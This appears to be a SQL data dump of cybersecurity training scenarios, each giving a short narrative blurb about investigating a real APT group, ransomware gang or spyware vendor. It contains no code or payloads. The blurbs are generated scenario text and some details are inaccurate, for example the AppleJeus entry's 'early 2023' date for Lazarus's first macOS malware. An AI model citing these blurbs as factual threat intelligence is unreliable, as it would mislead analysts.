(151, 'Operation IndigoZebra', 'IndigoZebra', 'Investigate IndigoZebra\'s Central Asian espionage, focusing on Dropbox API abuse and xCaon malware.', 'In the heart of Central Asia, government entities are under siege. The notorious APT group, IndigoZebra, has launched a sophisticated espionage campaign. Utilizing the Dropbox API for covert command and control, and deploying the elusive xCaon malware family, they aim to infiltrate, persist, and exfiltrate sensitive information. Your mission is to dismantle their operations and protect national security.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"IndigoZebra\\\",\\\"Central Asian espionage\\\",\\\"Dropbox API abuse\\\",\\\"xCaon malware\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-03-01 22:54:53', 'IndigoZebra: Unveiling the Central Asian Espionage Campaign', 'Investigate IndigoZebra\'s Central Asian espionage, focusing on Dropbox API abuse and xCaon malware.', 'operation-indigozebra', 1),
(152, 'Operation Moses Staff', 'Moses Staff (Iranian)', 'Explore the tactics of Moses Staff targeting Israeli organizations with DCSrv wiper and political data leaks.', 'In this hands-on training scenario, participants will step into the shoes of a cyber threat intelligence analyst tasked with investigating the notorious Iranian APT group, Moses Staff. Known for their politically-motivated cyber operations against Israeli organizations, this group employs sophisticated tactics to not only disrupt but also to make a political statement through data leaks. Trainees will delve into the analysis of the DCSrv wiper malware, uncovering the methods used by this APT to infiltrate and compromise targets. By following the trail of alerts, participants will learn to piece together a comprehensive picture of the attack, understanding the motivations and techniques of the adversary.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Moses Staff\\\",\\\"Iranian APT\\\",\\\"DCSrv Wiper\\\",\\\"Cybersecurity Training\\\",\\\"Data Leaks\\\"]\"', '', 3, '2026-03-01 22:55:17', 'Investigate Moses Staff: Unveiling Iranian Hacktivist Attacks on Israel', 'Explore the tactics of Moses Staff targeting Israeli organizations with DCSrv wiper and political data leaks.', 'operation-moses-staff', 1),
(153, 'Agrius (Iranian)', 'Agrius (Iranian)', 'Explore Agrius APT\'s tactics with Apostle wiper mimicking ransomware in attacks on Israeli targets.', 'In the world of cyber warfare, the Iranian APT group Agrius is notorious for its unique blend of espionage and destructive attacks. This operation takes you through a simulated investigation into their signature move: deploying the Apostle wiper disguised as ransomware, with a particular focus on Israeli targets. Your mission is to unravel the sequence of events and prevent a catastrophe.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Agrius APT\\\",\\\"Apostle wiper\\\",\\\"cyber espionage\\\",\\\"ransomware\\\",\\\"Israeli cybersecurity\\\"]\"', '', 5, '2026-03-01 22:55:41', 'Investigating Agrius APT: Espionage and Destruction with Apostle Wiper', 'Explore Agrius APT\'s tactics with Apostle wiper mimicking ransomware in attacks on Israeli targets.', 'agrius-iranian', 1),
(154, 'Operation MuddyC3', 'MuddyWater', 'Analyze MuddyWater\'s PowerShell backdoors targeting Middle Eastern telecoms in this advanced cybersecurity operation.', 'As a senior cyber threat intelligence analyst, you are tasked with delving into the complex and evolving tactics of MuddyWater, an APT group known for its sophisticated cyber operations. Recently, MuddyWater has been observed refining its custom Command and Control (C2) framework, leveraging PowerShell-based backdoors to infiltrate and exploit telecommunications companies in the Middle East. Your mission is to investigate these developments, understand their methodologies, and identify strategic vulnerabilities.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"MuddyWater\\\",\\\"PowerShell backdoors\\\",\\\"C2 framework\\\",\\\"Middle Eastern telecommunications\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-03-01 22:56:11', 'Advanced Investigation into MuddyWater\'s Evolving C2 Framework', 'Analyze MuddyWater\'s PowerShell backdoors targeting Middle Eastern telecoms in this advanced cybersecurity operation.', 'operation-muddyc3', 1),
(155, 'Operation Lyceum', 'Lyceum (Hexane)', 'Investigate Lyceum\'s sophisticated operations against oil, gas, and telecom sectors using DanBot malware for credential harvesting.', 'In the heat of geopolitical tensions, the infamous Iranian APT group, Lyceum, has initiated a campaign targeting the vital oil, gas, and telecommunications sectors in the Middle East. As cyber defenders, you\'re tasked with uncovering their covert operations, analyzing the DanBot malware, and thwarting their relentless attempts to compromise sensitive credentials. This expert-level scenario demands a keen eye and strategic thinking to connect the dots and mitigate the threat posed by this adept adversary.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Lyceum APT\\\",\\\"DanBot Malware\\\",\\\"Cyber Threat Intelligence\\\",\\\"Credential Harvesting\\\",\\\"Middle East Cybersecurity\\\"]\"', '', 6, '2026-03-01 22:56:37', 'Expert Analysis of Lyceum\'s Targeted Attacks in the Middle East', 'Investigate Lyceum\'s sophisticated operations against oil, gas, and telecom sectors using DanBot malware for credential harvesting.', 'operation-lyceum', 1),
(156, 'Operation Kimsuky Campaign', 'Kimsuky (Thallium)', 'Investigate Kimsuky espionage tactics using AppleSeed and phishing against South Korean entities in this novice-level scenario.', 'The infamous North Korean APT group Kimsuky is back on the radar. Known for its focus on intelligence gathering, the group is now targeting South Korea\'s government and Unification Ministry. Your mission is to delve into their operations, unravel the use of the AppleSeed backdoor, and dismantle their credential phishing infrastructure. As a novice analyst, you\'ll piece together clues from a series of alerts to protect critical national interests.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Kimsuky\\\",\\\"cyber espionage\\\",\\\"AppleSeed\\\",\\\"phishing\\\",\\\"APT\\\"]\"', '', 5, '2026-03-01 23:00:24', 'Kimsuky Espionage Simulation: Unmasking North Korean Threats', 'Investigate Kimsuky espionage tactics using AppleSeed and phishing against South Korean entities in this novice-level scenario.', 'operation-kimsuky-campaign', 1),
(157, 'Operation Andariel Heist', 'Andariel (Silent Chollima)', 'Investigate Andariel\'s ATM hacks and IP theft in South Korea\'s defense sector.', 'In the ever-evolving landscape of cyber warfare, the Andariel Group, a notorious North Korean APT, has set its sights on South Korea\'s financial and defense sectors. Trainees must unravel the group\'s tactics, from ATM heists to the theft of sensitive defense contractor data. This mission is critical to ensuring the security of national resources and infrastructures.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Andariel APT\\\",\\\"Cybersecurity Training\\\",\\\"South Korea Defense\\\",\\\"ATM Hacks\\\",\\\"Intellectual Property Theft\\\"]\"', '', 5, '2026-03-01 23:00:47', 'Andariel\'s Assault: Defense and Finance Under Siege', 'Investigate Andariel\'s ATM hacks and IP theft in South Korea\'s defense sector.', 'operation-andariel-heist', 1),
(158, 'Operation BlueNoroff', 'BlueNoroff (Lazarus Subgroup)', 'Investigate BlueNoroff\'s SnatchCrypto campaign using AppleJeus malware against cryptocurrency startups.', 'In the shadowy world of cryptocurrency, a formidable adversary lurks. BlueNoroff, a subgroup of the infamous Lazarus Group, has launched the SnatchCrypto campaign, targeting emerging cryptocurrency startups. Their weapon of choice? The insidious AppleJeus malware. As a senior cyber threat intelligence analyst, you must delve into the depths of this operation, piecing together clues to thwart this sophisticated attack. From initial access to exfiltration, every step holds the key to unraveling BlueNoroff\'s grand scheme.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"BlueNoroff\\\",\\\"SnatchCrypto\\\",\\\"AppleJeus\\\",\\\"cryptocurrency\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-03-01 23:01:11', 'BlueNoroff\'s SnatchCrypto: Analyzing AppleJeus in Crypto Startups', 'Investigate BlueNoroff\'s SnatchCrypto campaign using AppleJeus malware against cryptocurrency startups.', 'operation-bluenoroff', 1),
(159, 'Operation TraderTraitor', 'Lazarus Group', 'Investigate Lazarus Group\'s targeting of cryptocurrency traders using trojanized apps and social engineering of developers.', 'In recent months, a surge in attacks targeting cryptocurrency traders and investors has been attributed to the infamous Lazarus Group. Known for their financial theft and espionage capabilities, this North Korean APT is now employing trojanized trading applications and sophisticated social engineering tactics to infiltrate blockchain development communities. Participants will navigate through a series of alerts, unraveling a complex plot aimed at exfiltrating valuable cryptocurrency assets.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Lazarus Group\\\",\\\"cryptocurrency attack\\\",\\\"trojanized applications\\\",\\\"social engineering\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-03-01 23:01:32', 'Lazarus Group Cryptocurrency Heist Simulation', 'Investigate Lazarus Group\'s targeting of cryptocurrency traders using trojanized apps and social engineering of developers.', 'operation-tradertraitor', 1),
(160, 'Operation Dream Job', 'Lazarus Group', 'Investigate Lazarus Group\'s LinkedIn-based social engineering targeting aerospace engineers with fake job offers.', 'In a new wave of cyber espionage, the notorious Lazarus Group has launched a sophisticated campaign targeting aerospace and defense engineers via LinkedIn. Using fake job offers as lures, the group seeks to infiltrate secure networks, gather intelligence, and potentially disrupt operations. This operation requires expert-level analysis to unearth the connections, trace the origins, and dismantle the threat.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Lazarus Group\\\",\\\"LinkedIn Phishing\\\",\\\"Aerospace Cybersecurity\\\",\\\"APT Threats\\\",\\\"Cyber Espionage\\\"]\"', '', 6, '2026-03-01 23:02:16', 'Lazarus Group\'s Aerospace and Defense Job Lure Campaign', 'Investigate Lazarus Group\'s LinkedIn-based social engineering targeting aerospace engineers with fake job offers.', 'operation-dream-job', 1),
(161, 'Operation In(ter)ception', 'Lazarus Group', 'Join the investigation into Lazarus Group\'s aerospace campaign, analyzing Mac malware and social engineering tactics.', 'The Lazarus Group, notorious for its sophisticated cyber operations, has shifted its sights to the aerospace and military contractor sector. With a history of high-profile attacks, this North Korean APT group blends espionage with financial motives. Trainees will delve into a campaign involving custom Mac malware and intricate social engineering, unraveling the layers of a cyber operation designed to breach sensitive industry networks.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Lazarus Group\\\",\\\"cybersecurity training\\\",\\\"aerospace defense\\\",\\\"Mac malware\\\",\\\"social engineering\\\"]\"', '', 3, '2026-03-03 22:00:09', 'Lazarus Group: Unmasking the Aerospace Campaign', 'Join the investigation into Lazarus Group\'s aerospace campaign, analyzing Mac malware and social engineering tactics.', 'operation-in-ter-ception', 1),
(162, 'Operation AppleJeus', 'Lazarus Group', 'Beginner scenario exploring Lazarus Group\'s first macOS malware and crypto exchange targeting.', 'In early 2023, a surge of compromised cryptocurrency trading applications hit the market. These apps, seemingly legitimate, were secretly crafted by the Lazarus Group, notorious for blending espionage with financial theft. Analysts must now delve into the first known macOS malware by Lazarus, following the group\'s footprints as they target cryptocurrency exchanges.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Lazarus Group\\\",\\\"macOS malware\\\",\\\"cryptocurrency\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-03-03 22:02:11', 'Investigating Lazarus Group\'s Trojanized Crypto Apps', 'Beginner scenario exploring Lazarus Group\'s first macOS malware and crypto exchange targeting.', 'operation-applejeus', 1),
(163, 'Operation CryptoCore', 'CryptoCore (Lazarus-linked)', 'Investigate CryptoCore\'s sophisticated spear-phishing and password manager exploitation targeting cryptocurrency exchanges.', 'In the heart of the digital currency revolution, a shadowy collective, CryptoCore, has unleashed a campaign targeting the lifeblood of cryptocurrency exchanges. With hundreds of millions at stake, their sophisticated spear-phishing tactics and cunning exploitation of password managers have propelled them into the limelight of global cyber investigations. As a senior analyst, your mission is to dismantle their operation, trace the digital breadcrumbs, and safeguard financial fortresses against impending threats.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"CryptoCore\\\",\\\"spear-phishing\\\",\\\"password manager\\\",\\\"cybersecurity\\\",\\\"cryptocurrency exchanges\\\"]\"', '', 5, '2026-03-07 00:49:22', 'Operation Crypto Heist: Unveiling CryptoCore\'s Deception', 'Investigate CryptoCore\'s sophisticated spear-phishing and password manager exploitation targeting cryptocurrency exchanges.', 'operation-cryptocore', 1),
(164, 'Operation FASTCash', 'APT38 (Lazarus)', 'Uncover APT38\'s ATM cash-out scheme manipulating transaction switches in Africa and Asia.', 'In the bustling financial districts of Africa and Asia, an elusive adversary lurks behind the shadows of digital transactions. Lazarus Group, North Korea\'s notorious cyber unit, has launched a sophisticated ATM cash-out scheme. Your mission is to delve into the depths of their operation, unravel the manipulation of transaction switches, and dismantle the coordinated mule networks threatening global financial stability. Prepare to face the advanced tactics of APT38 in this high-stakes cyber investigation.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"APT38\\\",\\\"Cybersecurity Training\\\",\\\"Financial Crime\\\",\\\"Lazarus Group\\\",\\\"ATM Cash-Out\\\"]\"', '', 5, '2026-03-07 00:49:55', 'Advanced Investigation: APT38 ATM Cash-Out in Africa and Asia', 'Uncover APT38\'s ATM cash-out scheme manipulating transaction switches in Africa and Asia.', 'operation-fastcash', 1),
(165, 'Operation Blockbuster- Sony Pictures', 'Lazarus Group', 'Engage in an in-depth analysis of the Sony Pictures cyber attack to uncover the role of Lazarus Group in this high-profile incident.', 'In 2014, Sony Pictures became the target of a notorious cyber attack, leading to the leak of sensitive data and a significant blow to the entertainment giant\'s operations. As an expert cyber threat intelligence analyst, your mission is to conduct a thorough investigation to attribute this attack to the infamous Lazarus Group. Analyze code similarities, infrastructure overlaps, and North Korean attribution indicators to piece together the puzzle of this complex cyber operation.', 'expert', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Sony Pictures attack\\\\\\\",\\\\\\\"Lazarus Group\\\\\\\",\\\\\\\"Cybersecurity training\\\\\\\",\\\\\\\"APT analysis\\\\\\\",\\\\\\\"North Korean cyber threat\\\\\\\"]\\\"\"', '', 5, '2026-03-07 00:50:18', 'Expert Training: Unraveling the Sony Pictures Cyber Attack', 'Engage in an in-depth analysis of the Sony Pictures cyber attack to uncover the role of Lazarus Group in this high-profile incident.', 'operation-blockbuster-sony-pictures', 1),
(166, 'Operation Salt Typhoon', 'Salt Typhoon', 'Train against Salt Typhoon\'s breach of federal wiretap systems in 2026, a beginner-level cybersecurity operation.', 'In 2026, the world witnessed an unprecedented cyber event when Salt Typhoon, an APT group linked to Chinese state-sponsored actors, executed a massive breach of federal wiretap systems. This training scenario immerses participants in the unfolding crisis, challenging them to defend against the adversary\'s tactics and protect sensitive communications.', 'beginner', 0, 1, 0, 60, NULL, '\"\\\"[\\\\\\\"Salt Typhoon\\\\\\\",\\\\\\\"APT Group\\\\\\\",\\\\\\\"Cybersecurity Training\\\\\\\",\\\\\\\"Wiretap Breach\\\\\\\",\\\\\\\"Beginner\\\\\\\"]\\\"\"', '', 5, '2026-03-10 17:42:53', 'Salt Typhoon: Federal Wiretap Breach Training', 'Train against Salt Typhoon\'s breach of federal wiretap systems in 2026, a beginner-level cybersecurity operation.', 'operation-salt-typhoon', 1),
(167, 'Hidden Cobra\'s Cyber Strikes on Critical Infrastructure and Entertainment', 'Hidden Cobra (Lazarus)', 'Analyze Hidden Cobra\'s cyber operations targeting critical infrastructure and entertainment sectors with Destover and reconnaissance on Turkish financial systems.', 'In an era where cyber warfare shapes geopolitical landscapes, the notorious Lazarus Group—also known as Hidden Cobra—sets its sights on global critical infrastructure and entertainment sectors. As a senior cyber threat intelligence analyst, your mission is to dissect the group\'s latest incursions, focusing on the deployment of Destover wiper variants and subtle reconnaissance activities against Turkish financial systems. Unravel their tactics and protect vital assets from being caught in the crossfire of cyber espionage.', 'intermediate', 0, 1, 1, 60, NULL, '[\"Hidden Cobra\",\"cybersecurity training\",\"critical infrastructure\",\"Destover wiper\",\"Lazarus Group\"]', NULL, 5, '2026-03-15 19:05:48', 'Hidden Cobra\'s Cyber Strikes on Critical Infrastructure and Entertainment', 'Analyze Hidden Cobra\'s cyber operations targeting critical infrastructure and entertainment sectors with Destover and reconnaissance on Turkish financial systems.', 'operation-ghost-secret', 1),
(168, 'Lazarus Group: Advanced Threat Analysis Training', 'Lazarus Group', 'Investigate Lazarus Group\'s Rising Sun implant targeting defense, nuclear, and energy sectors.', 'In a world where national security is paramount, the Lazarus Group, North Korea\'s notorious cyber operations unit, has set its sights on the global defense, nuclear, and energy sectors. Using sophisticated tactics such as the Rising Sun implant and deceptive job recruitment lures, they aim to infiltrate and exploit critical infrastructure. This scenario challenges participants to unravel the complex web of cyber espionage and financial theft orchestrated by this infamous APT group.', 'advanced', 0, 1, 1, 60, NULL, '[\"Lazarus Group\",\"cybersecurity training\",\"advanced threat\",\"APT analysis\",\"Rising Sun implant\"]', NULL, 5, '2026-03-15 19:06:11', 'Lazarus Group: Advanced Threat Analysis Training', 'Investigate Lazarus Group\'s Rising Sun implant targeting defense, nuclear, and energy sectors.', 'operation-sharpshooter', 1),
(169, 'Defending Against Kimsuky: Protecting South Korean Think Tanks', 'Kimsuky', 'Investigate Kimsuky\'s targeting of South Korean think tanks using GoldDragon malware and Hangul Word Processor exploits.', 'In the shadowy world of cyber espionage, Kimsuky is known for its relentless pursuit of sensitive information. Recently, South Korean think tanks and North Korea watchers have become prime targets. This operation focuses on understanding and mitigating the threats posed by the GoldDragon malware family and the exploitation of the Hangul Word Processor (HWP), aiming to arm cybersecurity professionals with the knowledge to defend against such sophisticated attacks.', 'expert', 0, 1, 1, 60, NULL, '[\"Kimsuky\",\"GoldDragon malware\",\"Hangul Word Processor\",\"cyber espionage\",\"APT threat\"]', NULL, 6, '2026-03-15 19:06:32', 'Defending Against Kimsuky: Protecting South Korean Think Tanks', 'Investigate Kimsuky\'s targeting of South Korean think tanks using GoldDragon malware and Hangul Word Processor exploits.', 'operation-golddragon', 1),
(170, 'Kimsuky Cyber Espionage: A Novice Investigation into Interview Bait and Data Theft', 'Kimsuky', 'Explore Kimsuky\'s tactics involving fake interviews to infiltrate journalists and academics, leading to Chrome extension-based email theft.', 'In the heart of a bustling newsroom, journalists find themselves targeted by the notorious Kimsuky group. Known for their sophisticated social engineering techniques, they employ fake interview requests to gain initial access. As tension mounts, the story unfolds with Chrome extensions silently siphoning off sensitive email data. Are you ready to uncover the truth behind the deception?', 'novice', 0, 1, 1, 60, NULL, '[\"Kimsuky\",\"cyber espionage\",\"fake interview\",\"Chrome extension\",\"email theft\"]', NULL, 5, '2026-03-15 19:06:57', 'Kimsuky Cyber Espionage: A Novice Investigation into Interview Bait and Data Theft', 'Explore Kimsuky\'s tactics involving fake interviews to infiltrate journalists and academics, leading to Chrome extension-based email theft.', 'operation-smoke-screen', 1),
(171, 'APT41 Healthcare Data Breach Investigation', 'APT41 (Black Vine)', 'Explore APT41\'s Mivast backdoor in a healthcare data theft scenario, focusing on health insurance info.', 'In an unprecedented breach, a renowned healthcare facility has fallen victim to APT41, a notorious cyber espionage group. Known for their dual motives, APT41 has deployed the Mivast backdoor to infiltrate systems and exfiltrate sensitive patient data, with a unique focus on health insurance information. Your task is to follow their trail, understand their tactics, and mitigate further damage.', 'beginner', 0, 1, 1, 60, NULL, '[\"APT41\",\"Healthcare Cybersecurity\",\"Mivast Backdoor\",\"Patient Data Breach\",\"Cyber Threat Intelligence\"]', NULL, 5, '2026-03-15 19:07:18', 'APT41 Healthcare Data Breach Investigation', 'Explore APT41\'s Mivast backdoor in a healthcare data theft scenario, focusing on health insurance info.', 'operation-black-vine', 1),
(172, 'Investigating APT41\'s ASUS Supply Chain Attack', 'APT41 (Barium)', 'Understand APT41\'s ASUS supply chain attack targeting 600 specific MAC addresses amidst millions, enhancing your threat hunting skills.', 'In 2019, the world witnessed a sophisticated supply chain attack orchestrated by APT41, a notorious Chinese threat group. This operation compromised ASUS software updates, affecting millions of users. However, hidden within this mass distribution was a surgical strike aimed at 600 specific MAC addresses. As part of a cybersecurity operation team, your mission is to dissect this attack, uncover the methods used, and identify the targeted victims. This scenario will test your threat hunting and analytical skills in a real-world context.', 'intermediate', 0, 1, 1, 60, NULL, '[\"APT41\",\"Supply Chain Attack\",\"ASUS\",\"Cybersecurity Training\",\"Threat Intelligence\"]', NULL, 5, '2026-03-15 19:07:43', 'Investigating APT41\'s ASUS Supply Chain Attack', 'Understand APT41\'s ASUS supply chain attack targeting 600 specific MAC addresses amidst millions, enhancing your threat hunting skills.', 'operation-shadowhammer', 1),
(173, 'Advanced Investigation: Unraveling NetTraveler\'s Decade-Long Espionage', 'NetTraveler', 'Investigate NetTraveler\'s espionage campaign targeting government and diplomatic entities with a focus on Tibetan activists.', 'In this advanced training scenario, participants will delve into the ten-year espionage campaign orchestrated by the notorious APT group, NetTraveler. Known for their strategic targeting of government and diplomatic entities, this operation will challenge trainees to dissect the group\'s use of a simple yet effective Remote Access Trojan (RAT) and understand their specific focus on Tibetan activists. Trainees will navigate through a series of alerts that reflect real-world intelligence gathered from this persistent threat, honing their skills in identifying and mitigating advanced cyber threats.', 'advanced', 0, 1, 1, 60, NULL, '[\"NetTraveler\",\"espionage campaign\",\"cybersecurity training\",\"RAT\",\"Tibetan activists\"]', NULL, 5, '2026-03-15 19:08:07', 'Advanced Investigation: Unraveling NetTraveler\'s Decade-Long Espionage', 'Investigate NetTraveler\'s espionage campaign targeting government and diplomatic entities with a focus on Tibetan activists.', 'operation-nettraveler', 1),
(174, 'IceFog\'s Hit and Run Espionage: Defense Supply Chain Threat Analysis', 'IceFog', 'Investigate IceFog\'s \'hit and run\' espionage on Japan and South Korea\'s defense supply chains.', 'In this beginner-level training scenario, participants will step into the shoes of a cyber threat intelligence analyst tasked with unraveling the mystery behind IceFog\'s \'hit and run\' espionage campaign. This APT group is known for its swift, surgical strikes on defense supply chains in Japan and South Korea. As you navigate through a series of alerts, you\'ll uncover the techniques employed by IceFog and learn to identify and mitigate such threats in real-time.', 'beginner', 0, 1, 1, 60, NULL, '[\"IceFog\",\"cyber espionage\",\"defense supply chain\",\"APT\",\"cybersecurity training\"]', NULL, 5, '2026-03-15 19:08:26', 'IceFog\'s Hit and Run Espionage: Defense Supply Chain Threat Analysis', 'Investigate IceFog\'s \'hit and run\' espionage on Japan and South Korea\'s defense supply chains.', 'operation-icefog', 1),
(175, 'Operation Counter-Hack: Unveiling the Hacking Team Breach', 'Unknown (Counter-Hack)', 'Advanced investigation into the Hacking Team breach, revealing zero-days and industry impacts.', 'In a shocking turn of events, the Italian surveillance vendor Hacking Team has been compromised, exposing critical zero-day vulnerabilities and a controversial customer list. As a seasoned analyst, your task is to unravel the mystery behind this breach, assess the damage, and understand its implications on the global surveillance industry.', 'advanced', 0, 1, 1, 60, NULL, '[\"cybersecurity training\",\"Hacking Team breach\",\"zero-day vulnerabilities\",\"surveillance industry\"]', NULL, 5, '2026-03-15 19:08:48', 'Operation Counter-Hack: Unveiling the Hacking Team Breach', 'Advanced investigation into the Hacking Team breach, revealing zero-days and industry impacts.', 'operation-hacking-team', 1),
(176, 'Investigating Gamma Group\'s Surveillance Software Deployments', 'Commercial Spyware (Gamma Group)', 'Expert analysis of Gamma Group\'s spyware tactics, focusing on infection vectors, mobile device targeting, and human rights impacts.', 'In the digital shadows, the Gamma Group\'s commercial spyware has sparked global controversy. Tasked with unraveling the threads of their operations, your mission is to dive deep into the heart of their surveillance software deployments. As you navigate through sophisticated infection vectors and mobile device targeting, you\'ll uncover the stark human rights implications at play. This operation demands precision, expertise, and an unwavering commitment to justice.', 'expert', 0, 1, 1, 60, NULL, '[\"Gamma Group\",\"spyware\",\"surveillance\",\"cybersecurity\",\"human rights\"]', NULL, 7, '2026-03-15 19:09:14', 'Investigating Gamma Group\'s Surveillance Software Deployments', 'Expert analysis of Gamma Group\'s spyware tactics, focusing on infection vectors, mobile device targeting, and human rights impacts.', 'operation-finspy', 1),
(177, 'Cytrox Predator Spyware Investigation Training', 'Cytrox (Commercial Spyware)', 'Learn to investigate Cytrox Predator deployments and zero-click exploits targeting opposition politicians.', 'In this training scenario, participants will step into the shoes of a cyber threat investigator. An authoritarian government has been suspected of deploying Cytrox\'s Predator spyware to surveil opposition politicians. Your mission is to analyze the deployment methods, particularly focusing on zero-click exploits, and uncover the full extent of this cyber espionage operation. Will you be able to connect the dots and expose the threat?', 'novice', 0, 1, 1, 60, NULL, '[\"Cytrox\",\"Predator spyware\",\"zero-click exploits\",\"cyber threat intelligence\",\"authoritarian surveillance\"]', NULL, 4, '2026-03-15 19:09:35', 'Cytrox Predator Spyware Investigation Training', 'Learn to investigate Cytrox Predator deployments and zero-click exploits targeting opposition politicians.', 'operation-predator', 1),
(178, 'Candiru Spyware Threat Investigation Training', 'Candiru (Commercial Spyware)', 'Explore Candiru\'s spyware operations targeting activists and journalists through Windows browser exploits.', 'In this training scenario, participants will delve into the clandestine world of Candiru, an Israeli spyware vendor notorious for deploying sophisticated Windows browser exploits. As a cyber investigator, you will track the trail of digital breadcrumbs left by this APT group as they target activists and journalists across multiple countries. Your mission is to uncover their tactics, techniques, and procedures to thwart their malicious objectives.', 'beginner', 0, 1, 1, 60, NULL, '[\"Candiru\",\"spyware\",\"Windows exploits\",\"activists\",\"journalists\"]', NULL, 4, '2026-03-15 19:09:58', 'Candiru Spyware Threat Investigation Training', 'Explore Candiru\'s spyware operations targeting activists and journalists through Windows browser exploits.', 'operation-candiru', 1),
(179, 'Quadream REIGN Spyware Investigation Training', 'Quadream (Commercial Spyware)', 'Dive into the Quadream REIGN spyware, exploring zero-click iCloud exploits and sales to government clients.', 'In the shadowy world of commercial spyware, the Quadream group has devised a potent tool known as REIGN. Your task is to investigate a series of cyber incidents where REIGN has been deployed against iOS devices, utilizing sophisticated zero-click iCloud calendar exploits. As an intermediate analyst, you\'ll uncover the methods of operation, tracing the spyware\'s journey from initial access to data exfiltration, and unravel the web of government clients behind its deployment.', 'intermediate', 0, 1, 1, 60, NULL, '[\"Quadream\",\"REIGN spyware\",\"iOS exploits\",\"zero-click\",\"cybersecurity training\"]', NULL, 5, '2026-03-15 19:10:22', 'Quadream REIGN Spyware Investigation Training', 'Dive into the Quadream REIGN spyware, exploring zero-click iCloud exploits and sales to government clients.', 'operation-quadream', 1),
(180, 'Advanced Threat Analysis: Unmasking Black Basta\'s Ransomware Ploys', 'Black Basta', 'Explore Black Basta\'s ransomware tactics, double extortion strategies, and QBot alliances in this advanced cybersecurity training.', 'In the shadowy world of cybercrime, Black Basta, a ransomware group believed to share roots with the notorious Conti gang, has rapidly ascended to infamy. Known for their sophisticated double extortion tactics and strategic partnerships with the QBot malware operators, Black Basta poses a formidable threat. Your mission is to investigate their operations, unravel their methods, and understand the rapid rise of this elusive group. Can your team uncover their secrets and thwart their next move?', 'advanced', 0, 1, 1, 60, NULL, '[\"Black Basta\",\"ransomware\",\"cybersecurity training\",\"APT groups\",\"QBot\"]', NULL, 5, '2026-03-15 19:10:54', 'Advanced Threat Analysis: Unmasking Black Basta\'s Ransomware Ploys', 'Explore Black Basta\'s ransomware tactics, double extortion strategies, and QBot alliances in this advanced cybersecurity training.', 'operation-black-basta', 1),
(181, 'Royal APT: Analyzing Ransomware Tactics on Critical Infrastructure', 'Royal', 'Explore Royal APT\'s ransomware tactics targeting critical infrastructure using callback phishing in this novice training scenario.', 'As a cyber threat analyst, you are tasked with investigating a series of sophisticated ransomware attacks perpetrated by the Royal APT group, a faction known for evolving from former Conti members. Your mission is to dissect their methodology, particularly focusing on their callback phishing tactics and the targeting of critical infrastructure entities. This operation will guide you through the various stages of their attack to enhance your understanding of their threat landscape.', 'novice', 0, 1, 1, 60, NULL, '[\"Royal APT\",\"ransomware\",\"callback phishing\",\"critical infrastructure\",\"Conti\"]', NULL, 5, '2026-03-15 19:11:15', 'Royal APT: Analyzing Ransomware Tactics on Critical Infrastructure', 'Explore Royal APT\'s ransomware tactics targeting critical infrastructure using callback phishing in this novice training scenario.', 'operation-royal-ransomware', 1),
(182, 'Play APT: Ransomware Threat Analysis in Latin America', 'Play', 'Investigate Play APT\'s ransomware attacks on Latin American entities, focusing on Exchange vulnerabilities and intermittent encryption tactics.', 'In recent months, the Play APT group has intensified their ransomware operations targeting key Latin American organizations. They\'ve been exploiting vulnerabilities in Microsoft Exchange servers and employing unique intermittent encryption techniques. As a beginner analyst, your mission is to unravel this complex web, understand their tactics, and help mitigate future threats.', 'beginner', 0, 1, 1, 60, NULL, '[\"Play APT\",\"ransomware\",\"Exchange vulnerabilities\",\"Latin America\",\"cybersecurity training\"]', NULL, 5, '2026-03-15 19:11:37', 'Play APT: Ransomware Threat Analysis in Latin America', 'Investigate Play APT\'s ransomware attacks on Latin American entities, focusing on Exchange vulnerabilities and intermittent encryption tactics.', 'operation-play-ransomware', 1),
(183, 'Vice Society Ransomware: Education Sector Breach Simulation', 'Vice Society', 'Investigate Vice Society\'s ransomware attacks on school districts, focusing on student data privacy impacts.', 'In recent months, Vice Society, a notorious APT group, has set its sights on the education sector, launching a series of ransomware attacks targeting school districts. These attacks have not only disrupted educational services but have also raised significant concerns regarding the privacy and security of sensitive student data. As the lead analyst, you are tasked with piecing together the puzzle, identifying the breach points, and understanding the full impact of these malicious activities.', 'intermediate', 0, 1, 1, 60, NULL, '[\"Vice Society\",\"ransomware\",\"education sector\",\"student data privacy\",\"cybersecurity training\"]', NULL, 5, '2026-03-15 19:11:57', 'Vice Society Ransomware: Education Sector Breach Simulation', 'Investigate Vice Society\'s ransomware attacks on school districts, focusing on student data privacy impacts.', 'operation-vice-society', 1),
(184, 'Hive Ransomware Takedown Simulation: FBI Infiltration & Decryption Key Analysis', 'Hive Ransomware', 'Investigate the FBI\'s infiltration of Hive ransomware to prevent $130M in ransoms and analyze decryption key distribution.', 'In an unprecedented cybersecurity operation, the FBI successfully infiltrated the Hive ransomware group\'s infrastructure. Participants will delve into the intricacies of this takedown, examining how law enforcement distributed decryption keys and thwarted over $130 million in potential ransom payments. This advanced scenario offers a deep dive into the strategies and techniques employed by both the attackers and defenders.', 'advanced', 0, 1, 1, 60, NULL, '[\"FBI infiltration\",\"Hive ransomware\",\"cybersecurity training\",\"decryption keys\",\"ransom prevention\"]', NULL, 5, '2026-03-15 19:12:18', 'Hive Ransomware Takedown Simulation: FBI Infiltration & Decryption Key Analysis', 'Investigate the FBI\'s infiltration of Hive ransomware to prevent $130M in ransoms and analyze decryption key distribution.', 'operation-hive-takedown', 1),
